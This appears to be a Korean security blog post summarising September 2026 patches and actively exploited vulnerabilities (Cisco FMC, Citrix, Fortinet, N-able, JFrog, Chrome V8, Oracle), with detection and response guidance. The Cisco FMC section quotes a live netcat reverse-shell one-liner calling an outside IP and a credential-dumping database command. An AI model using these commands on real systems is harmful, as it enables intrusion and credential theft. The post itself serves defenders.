
1. 개요
- 2026년 9월은 단일 월 기준 역대 최대 규모의 패치가 집중된 기간으로 확인됨
- Microsoft 9월 Patch Tuesday에서 964개(CVE 기준) ~ 999개(벤더 집계 기준) 취약점이 수정되었으며, 그 중 2건은 제로데이로 야생 악용이 확인됨
- Oracle September CSPU에서 673개 패치, 672개 고유 CVE, 번들 포함 800개 이상 취약점이 해소되었으며 CVSS 10.0 취약점이 6건 포함됨
- CISA KEV에 9월 8일~9일 사이 총 5건이 신규 등록됨
- CVE-2026-86218 (N-able N-central, CVSS 10.0) - 마감 9/11
- CVE-2026-20079 (Cisco FMC, CVSS 10.0), CVE-2026-19490 (Citrix NetScaler, CVSS 9.3), CVE-2025-25249 (Fortinet, CVSS 9.8), CVE-2026-87491 (Chrome V8, CVSS 8.8) - 마감 9/12
- 경계 장비, RMM, 빌드 인프라에서 CVSS 9.8~10.0 취약점이 동시에 발생하고, 브라우저와 OS 취약점을 묶은 체인형 공격(BlueMoon)이 확인된 것이 특징임
2. 타임라인
- 8/28 JFrog Artifactory CVE-2026-82329 공개 및 고정 버전 6개 브랜치 배포
- 9/3 Chrome V8 CVE-2026-85046 고정 버전 배포, 제로데이로 확인
- 9/5 N-able N-central 2026.3 Hotfix 4 배포, CVE-2026-86218 수정
- 9/8 Microsoft Patch Tuesday 배포, CVE-2026-81963 / CVE-2026-85880 제로데이 포함
- 9/8 CISA KEV에 CVE-2026-86218 등록
- 9/9 CISA KEV에 4건 추가 등록, Cisco Talos FMC 악용 클러스터 3개 공개
- 9/11 Proofpoint BlueMoon 익스플로잇 체인 공개
- 9/16 Oracle September CSPU 공개
3. Microsoft Patch Tuesday
3.1 통계
- Tenable 기준: 104개 Critical, 860개 Important, 총 964개
- Rapid7 기준: Microsoft 자체 974개 + 서드파티 25개 = 999개로 집계, Windows 단독 723개 차지
- 유형별 비중: EoP 44.7%, RCE 26.8%
3.2 CVE-2026-81963 - Windows Update Stack EoP
- 기본 정보
- CVSS 7.8 / Important / CWE-59 Link Following
- 영향: Windows 11, Windows Server 2025 전 계열
- 고정: 9월 누적 업데이트
- 상세
- Windows Update Stack이 임시 디렉터리에 파일을 생성한 뒤 SYSTEM 권한으로 이동시키는 과정에서 심볼릭 링크 및 마운트 포인트 검증을 누락하는 취약점
- 공격자가 Temp 경로에 심볼릭 링크를 생성해 Update Stack이 임의 위치에 SYSTEM 권한으로 파일을 쓰도록 유도 가능
- 2022년 이후 동일 컴포넌트에서 7건 패치되었으나 야생 악용은 이번이 최초 사례로 확인됨
- 대응
- 9월 누적 업데이트 적용
- MoUsoCoreWorker.exe, TiWorker.exe의 Temp → System32 파일 이동 패턴 모니터링
3.3 CVE-2026-85880 - Windows ALPC EoP
- 기본 정보
- CVSS 7.8 / Important / CWE-122 Heap-based Buffer Overflow
- 영향: Windows 10, 11, Server 2012~2025
- 고정: 9월 누적 업데이트
- 상세
- ALPC(Advanced Local Procedure Call)는 커널 IPC 경로 중 가장 낮은 레벨에 위치하는 통신 메커니즘
- 낮은 권한 AppContainer 프로세스가 ALPC 메시지를 통해 커널에 데이터를 전달할 때 길이 검증 부족으로 힙 오버플로우 발생, SYSTEM 권한 획득 가능
- 2022년 이후 16건 패치, 2023년 4월 이후 3년 만의 ALPC 패치, CVE-2023-21674 이후 두 번째 제로데이 사례
- 연관성
- BlueMoon 체인의 최종 권한 상승 단계로 사용됨
- CrowdStrike는 ALPC 취약점이 로컬 코드 실행만 있으면 신뢰할 수 있는 권한 상승 프리미티브가 된다고 평가
3.4 기타 주요 Microsoft 취약점
- CVE-2026-69730 - Windows DNS Server RCE
- CVSS 9.8 / Critical / use-after-free
- 인증 없는 원격 공격자가 조작된 패킷으로 RCE 가능, Exploitation More Likely 평가
- 외부 노출 DNS 보유 시 최우선 패치 대상
- CVE-2026-69525 - Remote Desktop Services RCE
- CVSS 9.8 / use-after-free
- 관련 4건(CVE-2026-69514 CVSS 7.5, CVE-2026-69539 CVSS 7.5, CVE-2026-69599 CVSS 7.5, CVE-2026-69536 CVSS 7.1) 함께 패치됨
- CVE-2026-69676 - Windows Kerberos RCE
- CVSS 8.8 / Critical / capture-replay를 통한 인증 우회 및 코드 실행
4. CISA KEV 신규 등록 취약점
4.1 CVE-2026-20079 - Cisco Secure Firewall Management Center
- 기본 정보
- CVSS 10.0 / CWE-288 Authentication Bypass Using an Alternate Path
- 영향: FMC Software 웹 인터페이스
- 원인: 부팅 시 생성되는 부적절한 시스템 프로세스, 조작된 HTTP 요청으로 인증 우회 및 스크립트 실행 가능
- 결과: OS root 권한 획득
- 악용 현황 - Talos 3개 클러스터 공개
- Cluster 1 UAT-12197
- home.jsp 웹쉘을 CSM Tomcat webroot에 배치, 파라미터 F6C1F0E7 Base64 디코드 방식
- cmd.jar로
OmniQuery.pl -db mdb -e 'SELECT name, auth_data FROM users;'실행해 자격 증명 탈취 - IOC: home.jsp 해시 B037f45e02a289325a1a5eb0d4db6a9fce9954fd0fdfd07162cb4eb2acbef77d
- Cluster 2 UAT-11823 (Sandworm 연관)
- CVE-2026-20079 + CVE-2026-20316(저권한 로그인, CVSS 5.3) 조합 사용
/var/tmp/license.tmp를 Makeself 패키지로 위장,package_info.pl로 root 실행- 내부에 Netcat 리버스쉘 포함:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 208.123.119.215 3090 >/tmp/f - Cyclops Blink ELF 모듈러 임플란트 배포 - DoH IP 해석, /etc/init.d 영구화, 자격 증명 수집, 패킷 스니핑 기능
- Cluster 3 UAT-11988 (Qilin 랜섬웨어)
- 정적 자격 증명으로 로그인 후 package_info.pl LOTL 남용
- 수집 항목: AD 계정, MySQL 자격 증명, 도메인 컨트롤러/IP 매핑, 파일 서버 목록
- SOCKS5 프록시(socks5.py) + 리버스 SSH 터널로 389/636/88/445/5985 포워딩, Qilin 배포
- Cluster 1 UAT-12197
- 탐지 및 대응
/var/tmp/license.tmp존재 여부 확인이 핵심 탐지 포인트- Snort SID 66075-66080, 66883 적용
- 핫픽스 적용 후 9월 14일 주간 하드닝 릴리즈 적용 필요
- 관련 CVE
- CVE-2026-20316: CVSS 5.3, 정적 자격 증명으로 저권한 로그인 가능
- CVE-2026-20131: CVSS 9.8, Java 역직렬화 RCE
4.2 CVE-2026-19490 - Citrix NetScaler ADC/Gateway
- 기본 정보
- CVSS 9.3 / CWE-288
- 영향: Gateway(SSL VPN, ICA Proxy, CVPN, RDP Proxy) 또는 AAA 가상 서버로 구성된 경우만 해당
- 원인: SAML HTTP-Redirect 바인딩을 통한 인증 우회
- 악용 현황
- Previdian 허니팟에서 9월 3일부터 56회 시도, 9월 8일 하루 36회 탐지
- 6개 IP(호주, 독일, 일본, 미국)에서 출발
- 대응
- CTX696939 고정 빌드로 업그레이드 (14.1-47.46 이상, 13.1-59.19 이상 등 브랜치별)
- Gateway/AAA 설정 보유 여부 먼저 확인
4.3 CVE-2025-25249 - Fortinet FortiOS
- 기본 정보
- CVSS: 초기 7.4에서 9.8로 재분류 (NHS England 공지)
- CWE: CWE-122 Heap-based Buffer Overflow
- 영향: FortiOS, FortiSwitchManager, FortiSASE - cw_acd 데몬(UDP 5246)
- 원인: CAPWAP 요청 처리 중 힙 오버플로우로 인증 없이 RCE 가능
- 악용 현황 - PivotC2 RAT
- SOCRadar 분석: 7월부터 악용 시작
- Node.js 기반 RAT PivotC2 드랍 - TLS 아웃바운드 C2, 인터랙티브 쉘, 파일 전송, SOCKS5/HTTP 터널링, CIDR 스캔, FortiGate 설정 수집 및 자격 증명 복호화 기능
- 3,000개 IP 스캔, 178대 감염, 미국 집중
- 대응
- UDP 5246 외부 노출 제거
- FG-IR-25-084 패치 적용
- FortiGate에서 Node.js 프로세스 실행 여부 모니터링 및 자격 증명 교체
4.4 Chrome V8
- CVE-2026-87491 - Out of Bounds Write
- CVSS 8.8, Chrome 153.0.8010.36 이전 영향
- 조작된 HTML로 샌드박스 내 코드 실행 가능, 2026년 7번째 제로데이
- CVE-2026-85046 - Type Confusion
- CVSS 8.8, Chromium 기반 브라우저 전체 영향
- 8월 4일 제보, 8월 7일 Chromium 커밋에 패치, 9월 3일 Stable 배포 - 4주간 패치 갭 존재
- 해당 갭 기간 동안 공격자가 리버스 엔지니어링해 0-day로 활용
5. N-able N-central CVE-2026-86218
- 기본 정보
- CVSS 10.0 / CWE-96 Static Code Injection / 사전인증 RCE
- 영향: N-central 2026.3.1.14 이전 전 버전
- 고정: 2026.3 Hotfix 4(2026.3.1.14)
- 타임라인
- 9/5 08:11 UTC: HF3(2026.3.1.13) 배포 - CVE-2026-86206/86207 수정
- 9/5 16시경: Discord MSPGeek 채널 통해 제3의 연구자가 CVE-2026-86218 제로데이 제보
- 9/6 00시경: HF4 긴급 배포, 5주 동안 4번째 핫픽스
- 9/8: CISA KEV 등록, 마감 9/11
- 위험성
- N-central은 MSP가 고객사 수천 곳을 관리하는 RMM 플랫폼으로, 인터넷 노출 인스턴스 약 1,500개 추정
- 단일 인스턴스 침해 시 하위 고객사 전체가 연쇄 위험에 노출되는 구조
- Huntress는 fully patched 환경에서도 침해 조사 진행 중으로 밝힘
- 대응
- 온프레미스 HF4 즉시 적용, 클라우드는 N-able 자동 패치 완료
- N-central 로그에서 인증 없는 API 호출 및 비정상 프로세스 생성 여부 확인
6. JFrog Artifactory CVE-2026-82329
- 기본 정보
- CVSS 9.8 / CWE-287 Improper Authentication
- 영향: 셀프 호스팅 Artifactory, Cloud는 자동 패치
- 고정: 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38, 7.161.20
- 원인 분석 - Bishop Fox
- JFrog Access가 클러스터 조인 키 설정 문자열을 콤마로 split하면서 빈 항목 필터링을 누락
- 기본 설치에서는 설정값이 비어 있어 빈 문자열이 신뢰할 수 있는 조인 키로 등록됨
- 빈 키의 서명 시크릿은 누구나 유도 가능하므로 인증 없이 조인 요청 한 번으로 관리자 범위 토큰 발급 가능
- 악용
- Fastly 관측: 공개 후 수일 만에 저수준 프로빙에서 대규모 스캔으로 급증
- Wiz 보고: 8/15~9/8 기간 CVE-2026-42016(8.1), CVE-2026-42018(7.5)과 체인으로 관리자 권한 탈취 후 Rust 백도어 배포
- 대응
- 고정 버전으로 업그레이드
- 임시 완화:
system.yaml에shared.security.additionalJoinKeys에 랜덤 값 설정 - 8월 28일 이후 발급된 토큰 전수 폐기 및 access.log에서
/join엔드포인트 200 응답 조사
7. Oracle September CSPU
- 통계
- 673개 신규 패치, 672개 고유 CVE, 번들 포함 800개 이상 해소
- 17개 제품군에 분포, 100개 이상 Critical
- CVSS 10.0 6건
- CVE-2026-71133 Oracle Access Manager Authentication Engine
- CVE-2026-83099 Oracle Forms
- CVE-2026-83059 Oracle Internet Directory OID LDAP Server
- CVE-2026-83020 Oracle Platform Security for Java
- CVE-2026-83021 Oracle WebLogic Server Web Container
- CVE-2026-87230 Oracle Hyperion Financial Management Security
- Fusion Middleware에서만 153개 패치, 그 중 78개가 인증 없이 원격 익스플로잇 가능, 13개는 CVSS 9.9로 확인됨
- 기타
- CVE-2026-21962 Oracle HTTP Server 및 WebLogic Proxy Plug-in CVSS 10.0 - 8월 CISA KEV 등록, 야생 악용 중
- CVE-2026-64849 RCE - Hong Kong GovCERT가 PoC 공개와 함께 야생 악용 경고
8. BlueMoon 익스플로잇 체인
- 구성
- 1단계: CVE-2026-85046 V8 타입 혼동으로 RCE, 렌더러 장악
- 2단계: CVE-2026-87491 V8 샌드박스 탈출, 브로커 장악
- 3단계: CVE-2026-85880 ALPC 권한 상승, SYSTEM 획득
- 특징
- 패치 갭 무기화: Chromium 커밋 공개 → Stable 배포까지 2~4주 간격 존재, 해당 기간 리버스 엔지니어링해 0-day로 활용
- 빠른 확산: TA412가 8/28 최초 사용, 9월 초 중국 연계 3개 조직 + 미귀속 1개 조직이 동일 키트 사용
- AI 가속: 패치 diff 분석 자동화로 무기화 속도 증가
9. 탐지 및 대응
- 자산 식별
- Shodan/Censys 검색:
product:"N-central",product:"JFrog Artifactory",port:5246,title:"Citrix Gateway" - 내부 인벤토리:
opatch lsinventory로 Oracle 제품 확인
- Shodan/Censys 검색:
- 패치 우선순위
- P0(당일): CISA KEV 5건 + JFrog 9.8 + Oracle 10.0 6건 - 인터넷 노출 + 야생 악용 확인
- P1(3일): Windows DNS 9.8, RDP 9.8, Chrome 최신 버전
- P2(7일): Windows EoP 2건 포함 나머지 Critical
- P3(30일): Important 860개 단계적 배포
- 탐지 쿼리
- Windows: MoUsoCoreWorker.exe의 Temp → System32 파일 이동, Chrome 렌더러 자식 프로세스로 cmd.exe 생성 모니터링
- Cisco FMC:
/var/tmp/license.tmp존재 여부, Snort SID 66075-66080 - Fortinet:
diag sys udp6 list로 UDP 5246 외부 바인딩 확인 - JFrog: access.log에서 8/28 이후
/join200 응답 조사
- 자격 증명 관리
- FMC, NetScaler, FortiGate, Artifactory, N-central 관리자 비밀번호 및 API 토큰 전수 교체 필요 - PivotC2, Cyclops Blink는 설정 파일 및 자격 증명을 수집함
10. 요약
- 9월 취약점의 핵심은 단일 취약점이 아니라 체인형 공격으로 연결된다는 점임
- 경계 장비(FMC, NetScaler, FortiGate, Artifactory)는 로깅이 약하고 패치가 늦어 공격자가 선호하는 경로
- RMM(N-able)은 단일 침해가 공급망 전체로 확산되는 구조적 리스크를 보유
- 패치 갭은 새로운 0-day 마켓으로 작용하며, 오픈소스 커밋 공개 → Stable 배포 간격을 줄이는 것이 방어 전략이 됨
'Linux > 보안' 카테고리의 다른 글
| CVE-2026-26980 블라인드 SQL 인젝션 취약점 (0) | 2026.09.19 |
|---|---|
| 특정 ip 대역에서 mod_security 끄기 (0) | 2023.07.06 |
| ModSecurity에 OWASP의 CRS(Core Rule Set) 추가하기 (0) | 2022.08.19 |
| ModSecurity + Nginx 실적용 테스트 해보기 (0) | 2022.08.19 |